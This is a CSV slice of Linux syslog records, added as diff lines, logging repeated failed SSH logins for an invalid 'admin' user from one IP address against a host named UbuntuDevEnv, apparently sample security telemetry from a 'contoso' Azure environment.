+1495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:01,UbuntuDevEnv,2019-06-28 04:45:01,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:01,UbuntuDevEnv,2019-06-28 04:45:01,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 49504 ssh2 [preauth],86184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,49504,,
+1497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:01,UbuntuDevEnv,2019-06-28 04:45:01,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:01,UbuntuDevEnv,2019-06-28 04:45:01,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 49504: Too many authentication failures [preauth],86184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,49504,,
+1499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:02,UbuntuDevEnv,2019-06-28 04:45:02,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 60624,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:02,UbuntuDevEnv,2019-06-28 04:45:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:02,UbuntuDevEnv,2019-06-28 04:45:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:04,UbuntuDevEnv,2019-06-28 04:45:04,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 60624 ssh2,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:04,UbuntuDevEnv,2019-06-28 04:45:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:06,UbuntuDevEnv,2019-06-28 04:45:05,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 60624 ssh2,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:07,UbuntuDevEnv,2019-06-28 04:45:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:09,UbuntuDevEnv,2019-06-28 04:45:09,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 60624 ssh2,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:09,UbuntuDevEnv,2019-06-28 04:45:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:11,UbuntuDevEnv,2019-06-28 04:45:11,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 60624 ssh2,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:13,UbuntuDevEnv,2019-06-28 04:45:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:16,UbuntuDevEnv,2019-06-28 04:45:16,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 60624 ssh2,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:16,UbuntuDevEnv,2019-06-28 04:45:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:18,UbuntuDevEnv,2019-06-28 04:45:18,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 60624: Too many authentication failures [preauth],86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:18,UbuntuDevEnv,2019-06-28 04:45:18,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:18,UbuntuDevEnv,2019-06-28 04:45:18,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:18,UbuntuDevEnv,2019-06-28 04:45:18,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 60624 ssh2,86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:18,UbuntuDevEnv,2019-06-28 04:45:18,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 60624 ssh2 [preauth],86297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,60624,,
+1517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:20,UbuntuDevEnv,2019-06-28 04:45:20,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 37497,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:21,UbuntuDevEnv,2019-06-28 04:45:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:21,UbuntuDevEnv,2019-06-28 04:45:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:23,UbuntuDevEnv,2019-06-28 04:45:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37497 ssh2,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:23,UbuntuDevEnv,2019-06-28 04:45:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:25,UbuntuDevEnv,2019-06-28 04:45:25,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37497 ssh2,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:26,UbuntuDevEnv,2019-06-28 04:45:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:28,UbuntuDevEnv,2019-06-28 04:45:28,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37497 ssh2,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:28,UbuntuDevEnv,2019-06-28 04:45:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:30,UbuntuDevEnv,2019-06-28 04:45:30,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37497 ssh2,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:31,UbuntuDevEnv,2019-06-28 04:45:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:34,UbuntuDevEnv,2019-06-28 04:45:33,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37497 ssh2,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:34,UbuntuDevEnv,2019-06-28 04:45:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:36,UbuntuDevEnv,2019-06-28 04:45:35,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 37497 ssh2,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:36,UbuntuDevEnv,2019-06-28 04:45:35,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:36,UbuntuDevEnv,2019-06-28 04:45:35,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 37497: Too many authentication failures [preauth],86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:36,UbuntuDevEnv,2019-06-28 04:45:35,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 37497 ssh2 [preauth],86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,37497,,
+1534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:36,UbuntuDevEnv,2019-06-28 04:45:35,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86354,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:40,UbuntuDevEnv,2019-06-28 04:45:40,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 15805,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:40,UbuntuDevEnv,2019-06-28 04:45:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:40,UbuntuDevEnv,2019-06-28 04:45:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:43,UbuntuDevEnv,2019-06-28 04:45:42,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15805 ssh2,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:44,UbuntuDevEnv,2019-06-28 04:45:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:46,UbuntuDevEnv,2019-06-28 04:45:45,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15805 ssh2,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:48,UbuntuDevEnv,2019-06-28 04:45:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:50,UbuntuDevEnv,2019-06-28 04:45:50,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15805 ssh2,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:50,UbuntuDevEnv,2019-06-28 04:45:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:53,UbuntuDevEnv,2019-06-28 04:45:52,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15805 ssh2,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:53,UbuntuDevEnv,2019-06-28 04:45:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:54,UbuntuDevEnv,2019-06-28 04:45:54,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15805 ssh2,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:54,UbuntuDevEnv,2019-06-28 04:45:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:56,UbuntuDevEnv,2019-06-28 04:45:56,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:56,UbuntuDevEnv,2019-06-28 04:45:56,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 15805: Too many authentication failures [preauth],86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:56,UbuntuDevEnv,2019-06-28 04:45:56,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15805 ssh2,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:56,UbuntuDevEnv,2019-06-28 04:45:56,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:45:56,UbuntuDevEnv,2019-06-28 04:45:56,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 15805 ssh2 [preauth],86490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15805,,
+1553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:08,UbuntuDevEnv,2019-06-28 04:46:07,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 9537,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:08,UbuntuDevEnv,2019-06-28 04:46:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:08,UbuntuDevEnv,2019-06-28 04:46:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
